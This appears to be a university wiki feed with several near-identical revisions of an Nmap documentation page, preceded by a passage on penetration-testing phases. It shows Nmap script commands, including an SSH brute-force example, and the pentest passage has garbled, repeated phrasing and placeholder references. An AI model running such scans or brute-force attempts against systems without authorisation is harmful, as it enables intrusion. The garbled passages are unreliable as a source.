Setting the scope is arguably one of the most important components of a penetration test. While many volumes have been written on the various tools and techniques that can be used to gain to gain access to a network, very little has been written about the subject written about the topic that precedes penetration: preparation. Preparation. Neglecting the preparatory activities can leave the penetration tester (or his company) a number of problems, such as a Expansion of the project scope, dissatisfied customers, and even legal problems. The scope of a project defines exactly what should be tested. How each aspects of testing are performed is covered in the Order Rules section. The question to ask as a customer is: Is there sensitive equipment that needs to be handled with need to be careful with when testing? For a local bank, it can be a nuisance if the online banking pages go down for a few hours. When the online banking site of a local bank goes down for a few hours, it might upset a few customers, but would not be nearly as devastating as the compromise of a credit card database.&lt;br /&gt;
&lt;br /&gt;
Scope&lt;br /&gt;
- Which IP addresses or hosts are in scope, and which are not?&lt;br /&gt;
- Are exploits allowed to be used and likely to crash a service, or should we limit ourselves to just identifying possible vulnerabilities? to be detected?&lt;br /&gt;
- Does the customer realize that even a simple port scan can crash a server or router? &lt;br /&gt;
- Are social engineering attacks allowed to be carried out?&lt;br /&gt;
- Are there specific time windows where the tests should be performed?&lt;br /&gt;
&lt;br /&gt;
These are all questions that need to be clarified with the customer in order to avoid misunderstandings. Not to be neglected is to define in writing all the necessary information that is relevant for the penetration test. Each tester must have the authorization to perform a penetration test on the predefined target. If the target does not belong to the company (e.g., the web server is hosted by a third party provider), it is important to ensure that the customer has the formal authorization from the third party to perform the penetration test. &lt;br /&gt;
&lt;br /&gt;
=== Intelligence Gathering ===&lt;br /&gt;
&lt;br /&gt;
Intelligence Gathering is the process of reconnoitering a target to gather as much information as possible that can be used to penetrate the target in the vulnerability assessment and exploitation phase. The more information one can this phase, the more attack vectors one can exploit in the future. Reconnaissance is achieved with the use of tools such as port scanners to gain to get a picture of what systems are on the Internet or internal network and what services are and which services are running there. Open Source Intelligence (OSINT) is a form of information gathering in which information from publicly available sources is searched sources is searched, selected and analyzed to gain actionable insights. gain.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Threat Modeling ===&lt;br /&gt;
Threat modeling is about identifying and communicating information about the threats that may can impact a particular system or network. Security threat modeling enables an IT team to understand the nature of the threats and how they may impact the network. In addition, threat modeling can be used to analyze the dangers that threats pose to applications, taking into account their potential vulnerabilities. Based on the data found during information gathering, one develops strategies to penetrate a customer&#039;s systems. For example, if the customer develops proprietary software, an attacker could disrupt the company by gaining access to the internal development systems where source code is developed and tested, and sell the company&#039;s trade secrets to a competitor.&lt;br /&gt;
&lt;br /&gt;
=== Vulnerability Analysis ===&lt;br /&gt;
Vulnerability testing is about discovering vulnerabilities in systems and applications that can be exploited by attackers. These vulnerabilities can range from misconfiguration of hosts and services to insecure application design. . Next, pentesters begin actively discovering vulnerabilities to determine how successful exploit strategies might be. Failed exploits can crash services, trigger intrusion detection alerts, and otherwise ruin the chances of a successful exploit being. At this stage, pentesters often deploy vulnerability scanners that include a Vulnerability database. However, although vulnerability scanners are powerful tools, they cannot completely replace critical thinking, accordingly, results must be reviewed manually.&lt;br /&gt;
&lt;br /&gt;
=== Exploitation ===&lt;br /&gt;
The exploitation phase of a penetration test is exclusively about gaining access to a system or resource bypassing security constraints. If the previous phase, vulnerability assessment, has been properly conducted. This phase should be well planned and a precision strike. The main focus is to determine the main entry point into the organization and identify high-value targets.&lt;br /&gt;
&lt;br /&gt;
=== Post Exploitation ===&lt;br /&gt;
The purpose of the post-exploitation phase is to determine the value of the compromised&lt;br /&gt;
computer and to retain control of the computer for later use. If an unpatched legacy system is penetrated that is not part of a domain or otherwise networked with high-level targets, and that system  is not populated with information of interest to an attacker is filled. The risk of this vulnerability is significantly lower than if access to a domain controller has been proven. The value of the computer is determined by the sensitivity of the data stored on it and the usefulness of the computer for further  compromise of the network. The methods described in this phase  are intended to help the auditor identify and document sensitive data, determine configuration settings, communication channels, and relationships with other network devices that can be used to gain further access to the network,  and to establish one or more methods for subsequent access to the computer. For example, password hashes could be read to see if they can be used to access other systems.&lt;br /&gt;
&lt;br /&gt;
=== Reporting ===&lt;br /&gt;
A pentester must produce a detailed report on the testing process and the vulnerabilities discovered. A penetration test report is the only tangible product of a pentest. The entire purpose of a penetration test is to identify vulnerabilities and security issues that the organization can address - and these are communicated via the report. Therefore, a penetration tester must ensure that they produce the best report possible. A good penetration test report includes a summary of the results and the approach taken, summarizes the vulnerabilities and their impact on the organization, and makes recommendations on how to fix them. &lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11189</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11189"/>
		<updated>2023-01-27T19:35:18Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* References */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host:&lt;br /&gt;
&lt;br /&gt;
[[File:Nmap_output_on_specific_host.png]]&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service.&lt;br /&gt;
&lt;br /&gt;
• Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system.&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet.&lt;br /&gt;
&lt;br /&gt;
NSE scripts can be run individually or in combination with other scripts. Nmap ships with a large number of built-in scripts that can be used for various tasks. Additionally, the Nmap community has written and shared many more scripts that can be downloaded and used.&lt;br /&gt;
&lt;br /&gt;
Using NSE scripts can greatly enhance the functionality of Nmap and allow for more detailed and efficient network scans. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Here are a few examples of how NSE can be used:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: One of the most popular NSE scripts is &amp;quot;vulners&amp;quot;, which can be used to detect known vulnerabilities in a host or service. This script uses a vulnerability database to check for known vulnerabilities and can be run with the command &amp;quot;nmap --script vulners [target]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
• Information gathering: The &amp;quot;http-title&amp;quot; script can be used to gather the title of a website. The script sends an HTTP request to the target and parses the response to extract the title. This script can be run with the command &amp;quot;nmap --script http-title [target]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: The &amp;quot;ssh-brute&amp;quot; script can be used to perform a brute-force attack on an SSH service. The script tries to log in to the SSH service using a list of username and password combinations. This script can be run with the command &amp;quot;nmap --script ssh-brute [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
• Script for specific service: The &amp;quot;smb-enum-shares&amp;quot; script will enumerate the shared resources on the SMB service. This script can be run with the command &amp;quot;nmap --script smb-enum-shares [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
• Script for specific operating system: The &amp;quot;smb-os-discovery&amp;quot; script can be used to determine the operating system of a Windows host. This script can be run with the command &amp;quot;nmap --script smb-os-discovery [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Example of usage of vulners script:&lt;br /&gt;
&lt;br /&gt;
[[File:Nmap_script_vulners.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
* https://nmap.org/&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11188</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11188"/>
		<updated>2023-01-27T18:00:59Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host:&lt;br /&gt;
&lt;br /&gt;
[[File:Nmap_output_on_specific_host.png]]&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service.&lt;br /&gt;
&lt;br /&gt;
• Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system.&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet.&lt;br /&gt;
&lt;br /&gt;
NSE scripts can be run individually or in combination with other scripts. Nmap ships with a large number of built-in scripts that can be used for various tasks. Additionally, the Nmap community has written and shared many more scripts that can be downloaded and used.&lt;br /&gt;
&lt;br /&gt;
Using NSE scripts can greatly enhance the functionality of Nmap and allow for more detailed and efficient network scans. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Here are a few examples of how NSE can be used:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: One of the most popular NSE scripts is &amp;quot;vulners&amp;quot;, which can be used to detect known vulnerabilities in a host or service. This script uses a vulnerability database to check for known vulnerabilities and can be run with the command &amp;quot;nmap --script vulners [target]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
• Information gathering: The &amp;quot;http-title&amp;quot; script can be used to gather the title of a website. The script sends an HTTP request to the target and parses the response to extract the title. This script can be run with the command &amp;quot;nmap --script http-title [target]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: The &amp;quot;ssh-brute&amp;quot; script can be used to perform a brute-force attack on an SSH service. The script tries to log in to the SSH service using a list of username and password combinations. This script can be run with the command &amp;quot;nmap --script ssh-brute [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
• Script for specific service: The &amp;quot;smb-enum-shares&amp;quot; script will enumerate the shared resources on the SMB service. This script can be run with the command &amp;quot;nmap --script smb-enum-shares [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
• Script for specific operating system: The &amp;quot;smb-os-discovery&amp;quot; script can be used to determine the operating system of a Windows host. This script can be run with the command &amp;quot;nmap --script smb-os-discovery [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Example of usage of vulners script:&lt;br /&gt;
&lt;br /&gt;
[[File:Nmap_script_vulners.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://nmap.org/book/man-nse.html&lt;br /&gt;
* https://nmap.org/&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11187</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11187"/>
		<updated>2023-01-27T18:00:07Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* Nmap Script Engine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host:&lt;br /&gt;
&lt;br /&gt;
[[File:Nmap_output_on_specific_host.png]]&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service.&lt;br /&gt;
&lt;br /&gt;
• Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system.&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet.&lt;br /&gt;
&lt;br /&gt;
NSE scripts can be run individually or in combination with other scripts. Nmap ships with a large number of built-in scripts that can be used for various tasks. Additionally, the Nmap community has written and shared many more scripts that can be downloaded and used.&lt;br /&gt;
&lt;br /&gt;
Using NSE scripts can greatly enhance the functionality of Nmap and allow for more detailed and efficient network scans. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Here are a few examples of how NSE can be used:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: One of the most popular NSE scripts is &amp;quot;vulners&amp;quot;, which can be used to detect known vulnerabilities in a host or service. This script uses a vulnerability database to check for known vulnerabilities and can be run with the command &amp;quot;nmap --script vulners [target]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
• Information gathering: The &amp;quot;http-title&amp;quot; script can be used to gather the title of a website. The script sends an HTTP request to the target and parses the response to extract the title. This script can be run with the command &amp;quot;nmap --script http-title [target]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: The &amp;quot;ssh-brute&amp;quot; script can be used to perform a brute-force attack on an SSH service. The script tries to log in to the SSH service using a list of username and password combinations. This script can be run with the command &amp;quot;nmap --script ssh-brute [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
• Script for specific service: The &amp;quot;smb-enum-shares&amp;quot; script will enumerate the shared resources on the SMB service. This script can be run with the command &amp;quot;nmap --script smb-enum-shares [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
• Script for specific operating system: The &amp;quot;smb-os-discovery&amp;quot; script can be used to determine the operating system of a Windows host. This script can be run with the command &amp;quot;nmap --script smb-os-discovery [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Example of usage of vulners script:&lt;br /&gt;
&lt;br /&gt;
[[Nmap_script_vulners.png]]&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:Nmap_script_vulners.png&amp;diff=11186</id>
		<title>File:Nmap script vulners.png</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:Nmap_script_vulners.png&amp;diff=11186"/>
		<updated>2023-01-27T17:59:39Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11185</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11185"/>
		<updated>2023-01-27T17:59:24Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* Nmap Script Engine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host:&lt;br /&gt;
&lt;br /&gt;
[[File:Nmap_output_on_specific_host.png]]&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service.&lt;br /&gt;
&lt;br /&gt;
• Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system.&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet.&lt;br /&gt;
&lt;br /&gt;
NSE scripts can be run individually or in combination with other scripts. Nmap ships with a large number of built-in scripts that can be used for various tasks. Additionally, the Nmap community has written and shared many more scripts that can be downloaded and used.&lt;br /&gt;
&lt;br /&gt;
Using NSE scripts can greatly enhance the functionality of Nmap and allow for more detailed and efficient network scans. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Here are a few examples of how NSE can be used:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: One of the most popular NSE scripts is &amp;quot;vulners&amp;quot;, which can be used to detect known vulnerabilities in a host or service. This script uses a vulnerability database to check for known vulnerabilities and can be run with the command &amp;quot;nmap --script vulners [target]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
• Information gathering: The &amp;quot;http-title&amp;quot; script can be used to gather the title of a website. The script sends an HTTP request to the target and parses the response to extract the title. This script can be run with the command &amp;quot;nmap --script http-title [target]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: The &amp;quot;ssh-brute&amp;quot; script can be used to perform a brute-force attack on an SSH service. The script tries to log in to the SSH service using a list of username and password combinations. This script can be run with the command &amp;quot;nmap --script ssh-brute [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
• Script for specific service: The &amp;quot;smb-enum-shares&amp;quot; script will enumerate the shared resources on the SMB service. This script can be run with the command &amp;quot;nmap --script smb-enum-shares [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
• Script for specific operating system: The &amp;quot;smb-os-discovery&amp;quot; script can be used to determine the operating system of a Windows host. This script can be run with the command &amp;quot;nmap --script smb-os-discovery [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Example of usage of vulners script:&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11184</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11184"/>
		<updated>2023-01-27T17:56:46Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* Description */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host:&lt;br /&gt;
&lt;br /&gt;
[[File:Nmap_output_on_specific_host.png]]&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service.&lt;br /&gt;
&lt;br /&gt;
• Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system.&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet.&lt;br /&gt;
&lt;br /&gt;
NSE scripts can be run individually or in combination with other scripts. Nmap ships with a large number of built-in scripts that can be used for various tasks. Additionally, the Nmap community has written and shared many more scripts that can be downloaded and used.&lt;br /&gt;
&lt;br /&gt;
Using NSE scripts can greatly enhance the functionality of Nmap and allow for more detailed and efficient network scans. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Here are a few examples of how NSE can be used:&lt;br /&gt;
&lt;br /&gt;
• Vulnerability detection: One of the most popular NSE scripts is &amp;quot;vulners&amp;quot;, which can be used to detect known vulnerabilities in a host or service. This script uses a vulnerability database to check for known vulnerabilities and can be run with the command &amp;quot;nmap --script vulners [target]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
• Information gathering: The &amp;quot;http-title&amp;quot; script can be used to gather the title of a website. The script sends an HTTP request to the target and parses the response to extract the title. This script can be run with the command &amp;quot;nmap --script http-title [target]&amp;quot;&lt;br /&gt;
&lt;br /&gt;
• Brute-forcing: The &amp;quot;ssh-brute&amp;quot; script can be used to perform a brute-force attack on an SSH service. The script tries to log in to the SSH service using a list of username and password combinations. This script can be run with the command &amp;quot;nmap --script ssh-brute [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
• Script for specific service: The &amp;quot;smb-enum-shares&amp;quot; script will enumerate the shared resources on the SMB service. This script can be run with the command &amp;quot;nmap --script smb-enum-shares [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
• Script for specific operating system: The &amp;quot;smb-os-discovery&amp;quot; script can be used to determine the operating system of a Windows host. This script can be run with the command &amp;quot;nmap --script smb-os-discovery [target]&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11183</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11183"/>
		<updated>2023-01-27T17:56:16Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* Description */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
